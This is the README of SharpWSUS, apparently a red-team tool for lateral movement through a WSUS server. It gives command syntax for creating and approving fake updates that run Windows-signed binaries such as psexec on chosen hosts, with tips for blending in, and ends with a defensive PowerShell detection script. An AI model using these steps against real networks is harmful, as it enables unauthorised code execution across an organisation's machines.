SharpWSUS is a C# tool for lateral movement through WSUS. A corresponding blog post (https://labs.nettitude.com/blog/introducing-sharpwsus/) gives more detailed information about the tooling, its use case and detection.
Credits

Massive credit to the resources below, which really did 90% of this for me. This tool is just an enhancement of them for C2 reliability and flexibility.

https://github.com/AlsidOfficial/WSUSpendu - PowerShell tool for abusing WSUS
https://github.com/ThunderGunExpress/Thunder_Woosus - C# tool for abusing WSUS

Help Menu
    / ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
    \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
     ___) | | | | (_| | | | |_) \ V  V /  ___) | |_| |___) |
    |____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                           |_|
Phil Keeble @ Nettitude Red Team
Commands listed below have optional parameters in <>.

Locate the WSUS server:

    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:

    SharpWSUS.exe inspect

Create an update (NOTE: the payload has to be a Windows-signed binary):

    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>

Approve an update:

    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added to] /approver:[Name of approver]>

Check the status of an update:

    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete an update and clean up the groups that were added:

    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
Example Usage

Notes

The binary has to be Windows-signed, so psexec, msiexec, msbuild etc. could be useful for lateral movement. The metadata on the create command is not needed, but it is useful for blending in to the environment. When testing in a lab, the first update is usually quick, but each subsequent update will take a couple of hours (this is due to how Windows evaluates whether an update is already installed or not).
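As an added, defender-side example (not part of SharpWSUS or the linked blog post), the following PowerShell uses the WSUS administration API on the WSUS server to list locally published updates and their approvals, which is the data the create and approve commands above write. The assembly load, the seven-day window and the single-host-group heuristic are my assumptions, not anything the tool or the blog specifies.

```powershell
# Added detection example: run on the WSUS server (WSUS console/API installed).
# Assumes the Microsoft.UpdateServices.Administration assembly is loadable.
[void][Reflection.Assembly]::LoadWithPartialName('Microsoft.UpdateServices.Administration')
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()

$lookback = (Get-Date).AddDays(-7)   # assumed review window
$findings = @()

foreach ($u in $wsus.GetUpdates()) {
    # Content that did not come from Microsoft Update is locally published;
    # a package created with a tool like the one above falls in this class.
    if ($u.UpdateSource -ne 'Other') { continue }
    if ($u.CreationDate -lt $lookback) { continue }

    # Origin URIs of the files the update installs (where the binary was served from)
    $files = ($u.GetInstallableItems() | ForEach-Object { $_.Files } |
              ForEach-Object { $_.OriginUri }) -join ', '

    foreach ($a in $u.GetUpdateApprovals()) {
        $group   = $wsus.GetComputerTargetGroup($a.ComputerTargetGroupId)
        $members = @($group.GetComputerTargets()).Count

        $findings += [pscustomobject]@{
            Title      = $u.Title
            UpdateId   = $u.Id.UpdateId
            Created    = $u.CreationDate
            Approver   = $a.AdministratorName
            Action     = $a.Action
            Group      = $group.Name
            GroupSize  = $members
            Files      = $files
            # Heuristic (assumed): an Install approval scoped to a group that
            # holds exactly one host matches the approve/delete flow documented above.
            Suspicious = ($members -eq 1) -and ($a.Action -eq 'Install')
        }
    }
}

$findings | Sort-Object Created -Descending | Format-Table -AutoSize
```

Review anything flagged Suspicious against change records, and compare the Approver column with the accounts that are expected to approve updates in the environment.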